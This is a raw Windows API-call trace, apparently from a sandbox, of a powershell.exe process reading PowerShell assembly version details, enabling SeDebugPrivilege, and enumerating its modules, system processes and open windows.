	[0574.488] GetVersionExW (in: lpVersionInformation=0x14dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0574.490] GetVersionExW (in: lpVersionInformation=0x14dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0574.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0574.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0574.502] GetVersionExW (in: lpVersionInformation=0x14dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0574.503] SetErrorMode (uMode=0x1) returned 0x1
	[0574.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14dd90 | out: lpFileInformation=0x14dd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0575.847] SetErrorMode (uMode=0x1) returned 0x1
	[0575.853] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14e000 | out: lpdwHandle=0x14e000) returned 0x94c
	[0575.856] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be72d8 | out: lpData=0x2be72d8) returned 1
	[0575.858] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2be7374, puLen=0x14df70) returned 1
	[0575.861] lstrlenW (lpString="䅁") returned 1
	[0575.870] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be7450, puLen=0x14dee0) returned 1
	[0575.871] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0575.873] CoTaskMemAlloc (cb=0x2e) returned 0x2e4310
	[0575.873] lstrcpyW (in: lpString1=0x2e4310, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0575.874] CoTaskMemFree (pv=0x2e4310) 
	[0575.874] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be74a4, puLen=0x14dee0) returned 1
	[0575.874] lstrlenW (lpString="System.Management.Automation") returned 28
	[0575.874] CoTaskMemAlloc (cb=0x3c) returned 0x229860
	[0575.874] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0575.874] CoTaskMemFree (pv=0x229860) 
	[0575.874] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be7500, puLen=0x14dee0) returned 1
	[0575.874] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0575.874] CoTaskMemAlloc (cb=0x20) returned 0x2e4980
	[0575.874] lstrcpyW (in: lpString1=0x2e4980, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0575.874] CoTaskMemFree (pv=0x2e4980) 
	[0575.874] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be7540, puLen=0x14dee0) returned 1
	[0575.874] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0575.874] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0575.874] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0575.874] CoTaskMemFree (pv=0x229860) 
	[0575.874] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be75a8, puLen=0x14dee0) returned 1
	[0575.874] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0575.874] CoTaskMemAlloc (cb=0x76) returned 0x28eef0
	[0575.874] lstrcpyW (in: lpString1=0x28eef0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0575.874] CoTaskMemFree (pv=0x28eef0) 
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be7644, puLen=0x14dee0) returned 1
	[0575.875] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0575.875] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0575.875] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0575.875] CoTaskMemFree (pv=0x229860) 
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be76a8, puLen=0x14dee0) returned 1
	[0575.875] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0575.875] CoTaskMemAlloc (cb=0x58) returned 0x277460
	[0575.875] lstrcpyW (in: lpString1=0x277460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0575.875] CoTaskMemFree (pv=0x277460) 
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be7724, puLen=0x14dee0) returned 1
	[0575.875] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0575.875] CoTaskMemAlloc (cb=0x20) returned 0x2e4980
	[0575.875] lstrcpyW (in: lpString1=0x2e4980, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0575.875] CoTaskMemFree (pv=0x2e4980) 
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x2be73cc, puLen=0x14dee0) returned 1
	[0575.875] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0575.875] CoTaskMemAlloc (cb=0x66) returned 0x26c4b0
	[0575.875] lstrcpyW (in: lpString1=0x26c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0575.875] CoTaskMemFree (pv=0x26c4b0) 
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x0, puLen=0x14dee0) returned 0
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x0, puLen=0x14dee0) returned 0
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dee8, puLen=0x14dee0 | out: lplpBuffer=0x14dee8*=0x0, puLen=0x14dee0) returned 0
	[0575.875] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14deb8, puLen=0x14deb0 | out: lplpBuffer=0x14deb8*=0x2be7374, puLen=0x14deb0) returned 1
	[0575.877] CoTaskMemAlloc (cb=0x204) returned 0x2919b0
	[0575.877] VerLanguageNameW (in: wLang=0x0, szLang=0x2919b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0575.878] CoTaskMemFree (pv=0x2919b0) 
	[0575.878] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\", lplpBuffer=0x14df08, puLen=0x14df00 | out: lplpBuffer=0x14df08*=0x2be7300, puLen=0x14df00) returned 1
	[0575.884] GetCurrentProcessId () returned 0x114c
	[0577.456] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14ce30 | out: lpLuid=0x14ce30*(LowPart=0x14, HighPart=0)) returned 1
	[0577.459] GetCurrentProcess () returned 0xffffffffffffffff
	[0577.460] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14ce50 | out: TokenHandle=0x14ce50*=0x1c0) returned 1
	[0577.461] AdjustTokenPrivileges (in: TokenHandle=0x1c0, DisableAllPrivileges=0, NewState=0x2beab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0577.463] CloseHandle (hObject=0x1c0) returned 1
	[0577.467] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114c) returned 0x1c0
	[0577.476] EnumProcessModules (in: hProcess=0x1c0, lphModule=0x2beabb8, cb=0x200, lpcbNeeded=0x14de68 | out: lphModule=0x2beabb8, lpcbNeeded=0x14de68) returned 1
	[0577.478] GetModuleInformation (in: hProcess=0x1c0, hModule=0x13f370000, lpmodinfo=0x2beae28, cb=0x18 | out: lpmodinfo=0x2beae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0577.479] CoTaskMemAlloc (cb=0x804) returned 0x2ecd00
	[0577.479] GetModuleBaseNameW (in: hProcess=0x1c0, hModule=0x13f370000, lpBaseName=0x2ecd00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0577.479] CoTaskMemFree (pv=0x2ecd00) 
	[0577.480] CoTaskMemAlloc (cb=0x804) returned 0x2ecd00
	[0577.480] GetModuleFileNameExW (in: hProcess=0x1c0, hModule=0x13f370000, lpFilename=0x2ecd00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0577.480] CoTaskMemFree (pv=0x2ecd00) 
	[0577.481] CloseHandle (hObject=0x1c0) returned 1
	[0579.361] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x114c) returned 0x1c0
	[0579.362] GetExitCodeProcess (in: hProcess=0x1c0, lpExitCode=0x14df98 | out: lpExitCode=0x14df98*=0x103) returned 1
	[0579.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0x14df60 | out: SystemInformation=0x12beb088, ResultLength=0x14df60*=0x34b40) returned 0xc0000004
	[0579.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b0b8, Length=0x37340, ResultLength=0x14df60 | out: SystemInformation=0x12c0b0b8, ResultLength=0x14df60*=0x34b40) returned 0x0
	[0579.391] EnumWindows (lpEnumFunc=0x29666ac, lParam=0x0) 
	[0581.760] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0584.613] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x558
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x538
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x778
	[0586.256] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x778
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.257] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x460
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x3a8
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1bd0
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1bfc
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1a78
	[0586.258] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b90
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b04
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b34
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b64
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1bb0
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1acc
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1a2c
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x19a8
	[0586.259] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1944
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x18c8
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x18ac
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x18ec
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1898
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc98
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x153c
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1808
	[0586.260] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x12a4
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1740
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x16c4
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1820
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x16ac
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1858
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1664
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x10b4
	[0586.261] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x10ac
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x10ec
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1068
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x17e0
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x102c
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x17a4
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1050
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1694
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1770
	[0586.262] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1720
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x165c
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1578
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x16c0
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x161c
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1638
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x15c8
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1554
	[0586.263] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1674
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1520
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x14bc
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xf8c
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe9c
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1434
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x14ec
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xfcc
	[0586.264] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x12ac
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1484
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x934
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc0c
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb08
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x948
	[0586.265] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1178
	[0586.266] GetWindow (hWnd=0x1060c, uCmd=0x4) returned 0x0
	[0586.267] IsWindowVisible (hWnd=0x1060c) returned 0
	[0586.267] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x13e0
	[0586.267] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xcd0
	[0586.267] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x13fc
	[0586.267] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xdc8
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc18
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc2c
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa1c
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1244
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xdb0
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1398
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1358
	[0586.268] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1370
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1340
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x130c
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x12c0
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x12e4
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1270
